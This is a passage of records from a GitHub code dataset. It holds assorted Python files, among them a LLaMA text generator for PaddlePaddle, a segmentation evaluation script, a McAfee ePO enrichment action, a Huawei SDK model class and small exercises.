columns[0].split(\"_\")[0]\n bugs_model_data_dict[f\"{home_or_away}_match_stats\"] = {}\n for col in columns:\n col_data = df[col].tolist()\n clean_col = col.split(f\"{home_or_away}_\")[-1]\n bugs_model_data_dict[f\"{home_or_away}_match_stats\"][clean_col] = col_data\n \n return bugs_model_data_dict\n\n\ndef create_file_with_all_data_for_bugs_model(which_data=\"clean\", just_key_comps=False, by_season=True):\n BUGS_DIR = cfg['DIRS']['BUGS_DATA']\n os.makedirs(os.path.join(BUGS_DIR, which_data), exist_ok=True)\n\n if by_season:\n seasons = get_feature_set_data(which_data=which_data, just_key_comps=just_key_comps).league_season.unique()\n\n bugs_model_data_dict = {}\n for season in seasons:\n bugs_model_data_dict[str(season)] = combine_all_bugs_model_data(which_data=which_data, just_key_comps=just_key_comps, season=season)\n filename = \"bugs_model_data_dict_seasons_split.json\"\n with open(os.path.join(BUGS_DIR, which_data, filename), \"w\") as w:\n sjson.dump(bugs_model_data_dict, w, ignore_nan=True)\n \n else:\n bugs_model_data_dict = combine_all_bugs_model_data(which_data=which_data, just_key_comps=just_key_comps)\n filename = \"bugs_model_data_dict_seasons_combined.json\"\n with open(os.path.join(BUGS_DIR, which_data, filename), \"w\") as w:\n sjson.dump(bugs_model_data_dict, w, ignore_nan=True)\n \n print(f\"COMPLETE - All bugs data needed for the model saved in file '{filename}' at\\n{os.path.join(BUGS_DIR, which_data)}\")\n print(dt.today().strftime(\"%d-%m-%Y %H:%M:%S\"))\n","repo_name":"AmirAl-Jumaily/BSc-Project---Football-Match-Simulation","sub_path":"python_files/etl_bugs.py","file_name":"etl_bugs.py","file_ext":"py","file_size_in_byte":7528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"25123537835","text":"from typing import List\n\nimport paddle\n\nfrom ppllama.tokenizer import Tokenizer\nfrom ppllama.model import Transformer\n\n\nclass LLaMA:\n def __init__(self, model: Transformer, tokenizer: Tokenizer):\n self.model = model\n self.tokenizer = tokenizer\n\n def generate(\n self,\n prompts: List[str],\n max_gen_len: int,\n temperature: float = 0.8,\n top_p: float = 0.95,\n ) -> List[str]:\n bsz = len(prompts)\n params = self.model.params\n assert bsz <= params.max_batch_size, (bsz, params.max_batch_size)\n\n prompt_tokens = [self.tokenizer.encode(x, bos=True, eos=False) for x in prompts]\n\n min_prompt_size = min([len(t) for t in prompt_tokens])\n max_prompt_size = max([len(t) for t in prompt_tokens])\n\n total_len = min(params.max_seq_len, max_gen_len + max_prompt_size)\n\n tokens = paddle.full((bsz, total_len), fill_value=self.tokenizer.pad_id,dtype=\"int64\")\n for k, t in enumerate(prompt_tokens):\n tokens[k, : len(t)] = paddle.to_tensor(t,dtype=\"int64\")\n input_text_mask = tokens != self.tokenizer.pad_id\n start_pos = min_prompt_size\n prev_pos = 0\n for cur_pos in range(start_pos, total_len):\n logits = self.model.forward(tokens[:, prev_pos:cur_pos], prev_pos)\n if temperature > 0:\n probs = paddle.nn.functional.softmax(logits / temperature, axis=-1)\n next_token = sample_top_p(probs, top_p)\n else:\n next_token = paddle.argmax(logits, axis=-1)\n next_token = next_token.reshape([-1])\n # only replace token if prompt has already been generated\n next_token = paddle.where(\n input_text_mask[:, cur_pos], tokens[:, cur_pos], next_token\n )\n tokens[:, cur_pos] = next_token\n prev_pos = cur_pos\n\n decoded = []\n for i, t in enumerate(tokens.tolist()):\n # cut to max gen len\n t = t[: len(prompt_tokens[i]) + max_gen_len]\n # cut to eos tok if any\n try:\n t = t[: t.index(self.tokenizer.eos_id)]\n except ValueError:\n pass\n decoded.append(self.tokenizer.decode(t))\n return decoded\n\n\ndef sample_top_p(probs, p):\n probs_sort = paddle.sort(probs, axis=-1, descending=True)\n probs_idx = paddle.argsort(probs, axis=-1, descending=True)\n probs_sum = paddle.cumsum(probs_sort, axis=-1)\n mask = probs_sum - probs_sort > p\n probs_sort[mask] = 0.0\n probs_sort = probs_sort / (probs_sort.sum(axis=-1, keepdim=True))\n next_token = paddle.multinomial(probs_sort, num_samples=1)\n next_token = gather(probs_idx, -1, next_token)\n\n # test torch multinomial\n # next_token = torch.multinomial(torch.from_numpy(probs_sort.numpy()), num_samples=1)\n # next_token = torch.gather(torch.from_numpy(probs_idx.numpy()), -1, next_token)\n\n return next_token\n\ndef gather(x, axis, index):\n index_shape = index.shape\n index_flatten = index.flatten()\n if axis < 0: # last dim\n axis = x.ndim + axis\n nd_index = []\n for k in range(x.ndim):\n if k == axis:\n nd_index.append(index_flatten)\n else:\n reshape_shape = [1] * x.ndim\n reshape_shape[k] = x.shape[k]\n dim_index = paddle.expand(paddle.arange(x.shape[k], dtype=index.dtype).reshape(reshape_shape),\n index_shape).flatten()\n nd_index.append(dim_index)\n paddle_out = paddle.gather_nd(x, paddle.stack(nd_index, axis=-1)).reshape(index_shape)\n return paddle_out\n\n\nif __name__ == '__main__':\n import numpy as np\n np.random.seed(1)\n # torch.manual_seed(1)\n paddle.seed(1)\n bsz,seq,vocab = 4,10,100\n p=0.8\n logits = np.random.randn(bsz,vocab)\n logits = paddle.to_tensor(logits)\n temperature=1\n probs = paddle.nn.functional.softmax(logits / temperature, axis=-1)\n next_token = sample_top_p(probs,p)\n print(next_token)","repo_name":"jiaohuix/ppllama","sub_path":"ppllama/generation.py","file_name":"generation.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"20"} +{"seq_id":"14908007286","text":"# System libs\nimport os\nimport datetime\nimport argparse\nfrom distutils.version import LooseVersion\nfrom multiprocessing import Queue, Process\n# Numerical libs\nimport numpy as np\nimport math\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom scipy.io import loadmat\n# Our libs\nfrom dataset import ValDataset\nfrom models import ModelBuilder, SegmentationModule\nfrom utils import AverageMeter, colorEncode, accuracy, intersectionAndUnion, parse_devices\nfrom lib.nn import user_scattered_collate, async_copy_to\nfrom lib.utils import as_numpy, mark_volatile\nimport lib.utils.data as torchdata\nimport cv2\n# from tqdm import tqdm\n\n\ndef visualize_result(data, preds, args):\n colors = loadmat('data/color' + args.num_class + '.mat')['colors']\n (img, seg, info) = data\n\n # segmentation\n seg_color = colorEncode(seg, colors)\n\n # prediction\n pred_color = colorEncode(preds, colors)\n\n # aggregate images and save\n im_vis = np.concatenate((img, seg_color, pred_color),\n axis=1).astype(np.uint8)\n\n img_name = info.split('/')[-1]\n cv2.imwrite(os.path.join(args.result,\n img_name.replace('.jpg', '.png')), im_vis)\n\n\ndef evaluate(segmentation_module, loader, args, dev_id, result_queue):\n\n segmentation_module.eval()\n\n for i, batch_data in enumerate(loader):\n # process data\n batch_data = batch_data[0]\n seg_label = as_numpy(batch_data['seg_label'][0])\n\n img_resized_list = batch_data['img_data']\n quadtree_resized_list = batch_data['quadtree']\n \n with torch.no_grad():\n segSize = (seg_label.shape[0], seg_label.shape[1])\n pred = torch.zeros(1, args.num_class, segSize[0], segSize[1])\n pred = Variable(pred).cuda()\n\n for scale, img in enumerate(img_resized_list):\n feed_dict = batch_data.copy()\n feed_dict['img_data'] = img\n if args.eval_mode == 'gt':\n feed_dict['qtree'] = quadtree_resized_list[scale]\n del feed_dict['img_ori']\n del feed_dict['info']\n feed_dict = async_copy_to(feed_dict, dev_id)\n\n # forward pass \n pred_tmp = segmentation_module(feed_dict, segSize=segSize)\n pred = pred + pred_tmp / len(args.imgSize)\n\n _, preds = torch.max(pred.data.cpu(), dim=1)\n preds = as_numpy(preds.squeeze(0))\n\n # calculate accuracy and SEND THEM TO MASTER\n acc, pix = accuracy(preds, seg_label)\n intersection, union = intersectionAndUnion(preds, seg_label, args.num_class)\n result_queue.put_nowait((acc, pix, intersection, union))\n\n # visualization\n if args.visualize:\n visualize_result(\n (batch_data['img_ori'], seg_label, batch_data['info']),\n preds, args)\n\n\ndef worker(args, dev_id, start_idx, end_idx, result_queue):\n torch.cuda.set_device(dev_id)\n\n # Dataset and Loader\n dataset_val = ValDataset(\n args.list_val, args, max_sample=args.num_val,\n start_idx=start_idx, end_idx=end_idx)\n loader_val = torchdata.DataLoader(\n dataset_val,\n batch_size=1,\n shuffle=False,\n collate_fn=user_scattered_collate,\n num_workers=2)\n\n # Network Builders\n builder = ModelBuilder()\n net_encoder = builder.build_encoder(arch=args.arch_encoder,\n fc_dim=args.fc_dim,\n weights=args.weights_encoder)\n if args.eval_mode == 'all':\n sparse_mode = False\n else:\n sparse_mode = True\n \n net_decoder = builder.build_decoder(arch=args.arch_decoder,\n fc_dim=args.fc_dim,\n num_class=args.num_class,\n weights=args.weights_decoder,\n use_softmax=True, \n sparse_mode=sparse_mode)\n\n crit = nn.NLLLoss(ignore_index=-1)\n\n segmentation_module = SegmentationModule(net_encoder, net_decoder, crit)\n\n segmentation_module.cuda()\n\n # Main loop\n evaluate(segmentation_module, loader_val, args, dev_id, result_queue)\n\n\ndef evaluate_simple(segmentation_module, loader, args):\n acc_meter = AverageMeter()\n intersection_meter = AverageMeter()\n union_meter = AverageMeter()\n\n segmentation_module.eval()\n\n for i, batch_data in enumerate(loader):\n # process data\n batch_data = batch_data[0]\n seg_label = as_numpy(batch_data['seg_label'][0])\n\n img_resized_list = batch_data['img_data']\n\n with torch.no_grad():\n segSize = (seg_label.shape[0], seg_label.shape[1])\n pred = torch.zeros(1, args.num_class, segSize[0], segSize[1])\n pred = Variable(pred).cuda()\n\n for img in img_resized_list:\n feed_dict = batch_data.copy()\n feed_dict['img_data'] = img\n del feed_dict['img_ori']\n del feed_dict['info']\n feed_dict = async_copy_to(feed_dict, args.gpu_id)\n\n # forward pass\n pred_tmp = segmentation_module(feed_dict, segSize=segSize)\n pred = pred + pred_tmp / len(args.imgSize)\n\n _, preds = torch.max(pred.data.cpu(), dim=1)\n preds = as_numpy(preds.squeeze(0))\n\n # calculate accuracy\n acc, pix = accuracy(preds, seg_label)\n intersection, union = intersectionAndUnion(preds, seg_label, args.num_class)\n acc_meter.update(acc, pix)\n intersection_meter.update(intersection)\n union_meter.update(union)\n\n if i % args.disp_iter == 0:\n print('[{}] iter {}, accuracy: {}'\n .format(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), i, acc))\n\n # visualization\n if args.visualize:\n visualize_result(\n (batch_data['img_ori'], seg_label, batch_data['info']),\n preds, args)\n\n iou = intersection_meter.sum / (union_meter.sum + 1e-10)\n for i, _iou in enumerate(iou):\n print('class [{}], IoU: {}'.format(i, _iou))\n\n print('[Eval Summary]:')\n print('Mean IoU: {:.4}, Accuracy: {:.2f}%'\n .format(iou.mean(), acc_meter.average()*100))\n\n return iou\n\n\ndef eval_train(args):\n torch.cuda.set_device(args.gpu_id)\n\n # Network Builders\n builder = ModelBuilder()\n net_encoder = builder.build_encoder(arch=args.arch_encoder,\n fc_dim=args.fc_dim,\n weights=args.weights_encoder)\n net_decoder = builder.build_decoder(arch=args.arch_decoder,\n fc_dim=args.fc_dim,\n num_class=args.num_class,\n weights=args.weights_decoder,\n use_softmax=True)\n\n crit = nn.NLLLoss(ignore_index=-1)\n\n segmentation_module = SegmentationModule(net_encoder, net_decoder, crit)\n\n # Dataset and Loader\n dataset_val = ValDataset(\n args.list_val, args, max_sample=args.num_val)\n loader_val = torchdata.DataLoader(\n dataset_val,\n batch_size=1,\n shuffle=False,\n collate_fn=user_scattered_collate,\n num_workers=5,\n drop_last=True)\n\n segmentation_module.cuda()\n\n # Main loop\n return evaluate_simple(segmentation_module, loader_val, args)\n\n\ndef main(args):\n # Parse device ids\n default_dev, *parallel_dev = parse_devices(args.devices)\n all_devs = parallel_dev + [default_dev]\n all_devs = [x.replace('gpu', '') for x in all_devs]\n all_devs = [int(x) for x in all_devs]\n nr_devs = len(all_devs)\n\n with open(args.list_val, 'r') as f:\n lines = f.readlines()\n nr_files = len(lines)\n if args.num_val > 0:\n nr_files = min(nr_files, args.num_val)\n nr_files_per_dev = math.ceil(nr_files / nr_devs)\n\n # pbar = tqdm(total=nr_files)\n\n acc_meter = AverageMeter()\n intersection_meter = AverageMeter()\n union_meter = AverageMeter()\n\n result_queue = Queue(500)\n procs = []\n for dev_id in range(nr_devs):\n start_idx = dev_id * nr_files_per_dev\n end_idx = min(start_idx + nr_files_per_dev, nr_files)\n proc = Process(target=worker, args=(args, dev_id, start_idx, end_idx, result_queue))\n print('process:%d, start_idx:%d, end_idx:%d' % (dev_id, start_idx, end_idx))\n proc.start()\n procs.append(proc)\n\n # master fetches results\n processed_counter = 0\n while processed_counter < nr_files:\n if result_queue.empty():\n continue\n (acc, pix, intersection, union) = result_queue.get()\n acc_meter.update(acc, pix)\n intersection_meter.update(intersection)\n union_meter.update(union)\n processed_counter += 1\n # pbar.update(1)\n\n for p in procs:\n p.join()\n\n iou = intersection_meter.sum / (union_meter.sum + 1e-10)\n for i, _iou in enumerate(iou):\n print('class [{}], IoU: {}'.format(i, _iou))\n\n print('[Eval Summary]:')\n print('Mean IoU: {:.4}, Accuracy: {:.2f}%'\n .format(iou.mean(), acc_meter.average()*100))\n\n print('Evaluation Done!')\n\n\nif __name__ == '__main__':\n assert LooseVersion(torch.__version__) >= LooseVersion('0.4.0'), \\\n 'PyTorch>=0.4.0 is required'\n\n parser = argparse.ArgumentParser()\n # Model related arguments\n parser.add_argument('--id', required=True,\n help=\"a name for identifying the model to load\")\n parser.add_argument('--suffix', default='_epoch_20.pth',\n help=\"which snapshot to load\")\n parser.add_argument('--arch_encoder', default='resnet50',\n help=\"architecture of net_encoder\")\n parser.add_argument('--arch_decoder', default='QGN_dense_resnet34',\n help=\"architecture of net_decoder\")\n parser.add_argument('--eval_mode', default='all',\n help=\"propagation scheme for evaluation\")\n parser.add_argument('--fc_dim', default=2048, type=int,\n help='number of features between encoder and decoder')\n\n # Path related arguments\n parser.add_argument('--list_val',\n default='./data/validation_ade20k.odgt')\n parser.add_argument('--root_dataset',\n default='./data/')\n\n # Data related arguments\n parser.add_argument('--num_val', default=-1, type=int,\n help='number of images to evalutate')\n parser.add_argument('--num_class', default=150, type=int,\n help='number of classes')\n parser.add_argument('--transform_dict', default=None,\n help='dictionary to map label ids to train ids')\n parser.add_argument('--imgSize', default=[300,375,450,525,600], nargs='+', type=int,\n help='list of input image sizes.'\n 'for multiscale testing, e.g. 300 400 500 600')\n parser.add_argument('--imgMaxSize', default=1000, type=int,\n help='maximum input image size of long edge')\n parser.add_argument('--padding_constant', default=32, type=int,\n help='maxmimum downsampling rate of the network')\n\n # Misc arguments\n parser.add_argument('--ckpt', default='./ckpt',\n help='folder to output checkpoints')\n parser.add_argument('--visualize', action='store_true',\n help='output visualization?')\n parser.add_argument('--result', default='./result',\n help='folder to output visualization results')\n parser.add_argument('--devices', default='gpu0',\n help='gpu_id for evaluation')\n\n args = parser.parse_args()\n print(args)\n\n # absolute paths of model weights\n args.weights_encoder = os.path.join(args.ckpt, args.id,\n 'encoder' + args.suffix)\n args.weights_decoder = os.path.join(args.ckpt, args.id,\n 'decoder' + args.suffix)\n\n print(args.weights_encoder, args.weights_decoder)\n assert os.path.exists(args.weights_encoder) and \\\n os.path.exists(args.weights_encoder), 'checkpoint does not exist!'\n\n args.result = os.path.join(args.result, args.id)\n if not os.path.isdir(args.result):\n os.makedirs(args.result)\n\n main(args)\n","repo_name":"kashyap7x/QGN","sub_path":"eval_multipro.py","file_name":"eval_multipro.py","file_ext":"py","file_size_in_byte":12577,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"20"} +{"seq_id":"20530680254","text":"print (\" First way solution\\n \")\n\nx = input(\" Enter 3 digits: \")\nsum_x = int(x[0]) + int(x[1]) + int(x[2])\nprint (f\" Сумма цифр числа {x} равняется {sum_x} \")\n\n###\nprint (\" \\n\\n Second way solution\\n \")\n\nx = int(input( \" Enter 3 digits: \"))\na = x%10 \nb = x%100//10\nc = x//100 \nsum_x = a + b + c\nprint (f\" Сумма цифр числа {x} равняется {sum_x} \")","repo_name":"ArtemBaldin/STUDY","sub_path":"PYTHON_INTRODUCTION/HOMEWORKS/home_work_2.py","file_name":"home_work_2.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"21621997205","text":"#!/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python\nimport sys\nfrom jwkest import jwe\nfrom jwkest import jws\n\n__author__ = 'roland'\n\njwt = sys.argv[1]\n\n_jw = jwe.factory(jwt)\nif _jw:\n print(\"jwe\")\nelse:\n _jw = jws.factory(jwt)\n if _jw:\n print(\"jws\")\n print(_jw.jwt.headers)\n print(_jw.jwt.part[1])\n","repo_name":"uetopia/metagame","sub_path":"lib/bin/peek.py","file_name":"peek.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"73632692850","text":"# -*- coding: utf-8 -*-\nimport sys\nsys.path.insert(0, '../../')\n\nfrom src.nlp_proc import tokenizacao\n\ntexto_exemplo = ['o câncer de pulmão é a doença maligna mais comum em todo o mundo; de todos os novos casos de câncer, 13% são de câncer de pulmão.(1) De acordo com o Global Burden of Disease Study 2015']\n\ntext_tokenizado = tokenizacao(texto_exemplo)\nprint(len(texto_exemplo))\nprint(\"----------\")\nprint(len(text_tokenizado))","repo_name":"carlosestevaobs/CompCognitiva","sub_path":"test_app/NLP/compute_tokenizacao.py","file_name":"compute_tokenizacao.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7816696449","text":"from SiemplifyAction import SiemplifyAction\nfrom McAfeeMvisionEPOV2Manager import McAfeeMvisionEPOV2Manager\nfrom SiemplifyUtils import output_handler, convert_dict_to_json_result_dict\nfrom ScriptResult import EXECUTION_STATE_COMPLETED, EXECUTION_STATE_FAILED\nfrom TIPCommon import extract_configuration_param, construct_csv\nfrom constants import ENRICH_ENDPOINT_SCRIPT_NAME, INTEGRATION_NAME, ENRICHMENT_PREFIX\nfrom exceptions import DeviceNotFoundException\nfrom SiemplifyDataModel import EntityTypes\n\n\n@output_handler\ndef main():\n siemplify = SiemplifyAction()\n siemplify.script_name = ENRICH_ENDPOINT_SCRIPT_NAME\n siemplify.LOGGER.info('----------------- Main - Param Init -----------------')\n\n # Configuration\n api_root = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='API Root',\n is_mandatory=True)\n\n iam_root = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='IAM Root',\n is_mandatory=True)\n\n client_id = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='Client ID',\n is_mandatory=True)\n client_secret = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='Client Secret',\n is_mandatory=True)\n api_key = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='API Key',\n is_mandatory=True)\n verify_ssl = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='Verify SSL',\n default_value=True, input_type=bool)\n\n scopes = extract_configuration_param(siemplify, provider_name=INTEGRATION_NAME, param_name='Scopes',\n is_mandatory=True)\n\n siemplify.LOGGER.info('----------------- Main - Started -----------------')\n status = EXECUTION_STATE_COMPLETED\n result_value = True\n enriched_entities = []\n enriched_entity_identifiers = []\n output_message = ''\n json_results = {}\n missing_entities = []\n failed_entities = []\n suitable_entities = [entity for entity in siemplify.target_entities if entity.entity_type == EntityTypes.ADDRESS\n or entity.entity_type == EntityTypes.HOSTNAME]\n try:\n siemplify.LOGGER.info(\"Connecting to McAfee Mvision ePO V2.\")\n manager = McAfeeMvisionEPOV2Manager(api_root, iam_root, client_id, client_secret, api_key, scopes, verify_ssl,\n siemplify.LOGGER)\n siemplify.LOGGER.info(\"Successfully connected to McAfee Mvision ePO V2.\")\n\n devices = []\n\n for entity in suitable_entities:\n try:\n siemplify.LOGGER.info('Started processing entity: {}'.format(entity.identifier))\n\n device = manager.find_entity_or_fail(entity.identifier,\n is_host=entity.entity_type == EntityTypes.HOSTNAME)\n devices.append(device)\n\n siemplify.LOGGER.info(\"Found device {} for entity {}.\".format(device.device_id, entity.identifier))\n\n json_results[entity.identifier] = device.to_json()\n enriched_entity_identifiers.append(entity.identifier)\n enriched_entities.append(entity)\n entity.additional_properties.update(device.to_enrichment_data(ENRICHMENT_PREFIX))\n entity.is_enriched = True\n\n siemplify.add_entity_insight(entity, device.to_insight())\n\n except DeviceNotFoundException:\n missing_entities.append(entity.identifier)\n siemplify.LOGGER.error(\"No device was found for entity: {}\".format(entity.identifier))\n\n except Exception as e:\n failed_entities.append(entity.identifier)\n siemplify.LOGGER.error(\"An error occurred on entity: {}\".format(entity.identifier))\n siemplify.LOGGER.exception(e)\n\n siemplify.LOGGER.info('Finished processing entity: {}'.format(entity.identifier))\n\n if devices:\n siemplify.result.add_data_table(\n title='Devices',\n data_table=construct_csv([device.to_table_data() for device in devices])\n )\n\n if enriched_entities:\n siemplify.update_entities(enriched_entities)\n output_message += 'Successfully enriched the following endpoints from McAfee Mvision ePO V2: \\n{}'.format(\n '\\n'.join(enriched_entity_identifiers))\n\n else:\n siemplify.LOGGER.info('\\n No entities were enriched.')\n output_message = 'No entities were enriched.'\n result_value = False\n\n if missing_entities:\n output_message += '\\n\\nAction was not able to find matching McAfee Mvision ePO V2 devices for the following endpoints: \\n{}'.format(\n '\\n'.join(missing_entities))\n\n if failed_entities:\n output_message += '\\n\\nAction was not able to enrich the following endpoints from McAfee Mvision ePO V2: \\n{}\\n'.format(\n '\\n'.join(failed_entities))\n\n except Exception as e:\n output_message = \"Error executing action '{}'. Reason: {}\".format(\n ENRICH_ENDPOINT_SCRIPT_NAME, e)\n siemplify.LOGGER.error(output_message)\n siemplify.LOGGER.exception(e)\n status = EXECUTION_STATE_FAILED\n result_value = False\n\n siemplify.result.add_result_json(convert_dict_to_json_result_dict(json_results))\n siemplify.LOGGER.info('----------------- Main - Finished -----------------')\n siemplify.LOGGER.info(\n '\\n status: {}\\n result_value: {}\\n output_message: {}'.format(status, result_value, output_message))\n siemplify.end(output_message, result_value, status)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chronicle/tip-marketplace","sub_path":"Integrations/McAfeeMvisionEPOV2/ActionsScripts/EnrichEndpoint.py","file_name":"EnrichEndpoint.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"28122710291","text":"time = input(\"Enter an amount of seconds \")\ntime = int(time)\nx = time % 60\ny = time - x \nminutes = y / 60\na = minutes % 60\nb = minutes - a\nhours = b / 60\nseconds_string = str(x)\nminutes_string= str(a)\nhours_string = str(hours)\nprint(\"{} seconds is equal to {} hours {} minutes {} seconds\".format(time,hours_string,minutes_string,seconds_string))\n","repo_name":"GonzaloChavez/cspp10","sub_path":"unit1/GChavez_seconds.py","file_name":"GChavez_seconds.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"21863510609","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass JoinRequestSchema:\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'region': 'str',\n 'name': 'str',\n 'email': 'str',\n 'organization': 'str',\n 'phone_number': 'str',\n 'invitation_code': 'str'\n }\n\n attribute_map = {\n 'region': 'region',\n 'name': 'name',\n 'email': 'email',\n 'organization': 'organization',\n 'phone_number': 'phone_number',\n 'invitation_code': 'invitation_code'\n }\n\n def __init__(self, region=None, name=None, email=None, organization=None, phone_number=None, invitation_code=None):\n \"\"\"JoinRequestSchema\n\n The model defined in huaweicloud sdk\n\n :param region: the region of user\n :type region: str\n :param name: the name of user\n :type name: str\n :param email: the email of user\n :type email: str\n :param organization: the organization of user\n :type organization: str\n :param phone_number: the phone_number of user\n :type phone_number: str\n :param invitation_code: the invitation_code\n :type invitation_code: str\n \"\"\"\n \n \n\n self._region = None\n self._name = None\n self._email = None\n self._organization = None\n self._phone_number = None\n self._invitation_code = None\n self.discriminator = None\n\n if region is not None:\n self.region = region\n if name is not None:\n self.name = name\n if email is not None:\n self.email = email\n if organization is not None:\n self.organization = organization\n if phone_number is not None:\n self.phone_number = phone_number\n if invitation_code is not None:\n self.invitation_code = invitation_code\n\n @property\n def region(self):\n \"\"\"Gets the region of this JoinRequestSchema.\n\n the region of user\n\n :return: The region of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._region\n\n @region.setter\n def region(self, region):\n \"\"\"Sets the region of this JoinRequestSchema.\n\n the region of user\n\n :param region: The region of this JoinRequestSchema.\n :type region: str\n \"\"\"\n self._region = region\n\n @property\n def name(self):\n \"\"\"Gets the name of this JoinRequestSchema.\n\n the name of user\n\n :return: The name of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this JoinRequestSchema.\n\n the name of user\n\n :param name: The name of this JoinRequestSchema.\n :type name: str\n \"\"\"\n self._name = name\n\n @property\n def email(self):\n \"\"\"Gets the email of this JoinRequestSchema.\n\n the email of user\n\n :return: The email of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._email\n\n @email.setter\n def email(self, email):\n \"\"\"Sets the email of this JoinRequestSchema.\n\n the email of user\n\n :param email: The email of this JoinRequestSchema.\n :type email: str\n \"\"\"\n self._email = email\n\n @property\n def organization(self):\n \"\"\"Gets the organization of this JoinRequestSchema.\n\n the organization of user\n\n :return: The organization of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._organization\n\n @organization.setter\n def organization(self, organization):\n \"\"\"Sets the organization of this JoinRequestSchema.\n\n the organization of user\n\n :param organization: The organization of this JoinRequestSchema.\n :type organization: str\n \"\"\"\n self._organization = organization\n\n @property\n def phone_number(self):\n \"\"\"Gets the phone_number of this JoinRequestSchema.\n\n the phone_number of user\n\n :return: The phone_number of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._phone_number\n\n @phone_number.setter\n def phone_number(self, phone_number):\n \"\"\"Sets the phone_number of this JoinRequestSchema.\n\n the phone_number of user\n\n :param phone_number: The phone_number of this JoinRequestSchema.\n :type phone_number: str\n \"\"\"\n self._phone_number = phone_number\n\n @property\n def invitation_code(self):\n \"\"\"Gets the invitation_code of this JoinRequestSchema.\n\n the invitation_code\n\n :return: The invitation_code of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._invitation_code\n\n @invitation_code.setter\n def invitation_code(self, invitation_code):\n \"\"\"Sets the invitation_code of this JoinRequestSchema.\n\n the invitation_code\n\n :param invitation_code: The invitation_code of this JoinRequestSchema.\n :type invitation_code: str\n \"\"\"\n self._invitation_code = invitation_code\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, JoinRequestSchema):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"huaweicloud/huaweicloud-sdk-python-v3","sub_path":"huaweicloud-sdk-cloudide/huaweicloudsdkcloudide/v2/model/join_request_schema.py","file_name":"join_request_schema.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"20"} +{"seq_id":"43497876049","text":"import argparse\nimport sys\nimport time\nimport timeit\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sn\nfrom mpi4py import MPI\nfrom sklearn import datasets, metrics, svm\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model.ridge import RidgeClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import KFold, train_test_split\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\n\nimport dataset_loader as loader\nimport StackingClassifier as st\n\n\ndef bcast_data(data):\n print(\n f'[INFO] Bcasting data from the root process ({rank})') if rank == 0 else None\n bcast_start_time = MPI.Wtime()\n data = comm.bcast(data, root=0)\n bcast_finish_time = MPI.Wtime()\n\n bcast_time = bcast_finish_time - bcast_start_time\n print(f'[TIME] Master process ({rank}) finished Bcasting data with time {bcast_time}') if rank == 0 else print(\n f'[TIME] Process {rank} finished receive bcasted data with time {bcast_time}')\n return data\n\n\ndef classify(X_train, X_test, y_train, y_test):\n # classification\n algorithm = None\n classification_time_start = MPI.Wtime()\n if 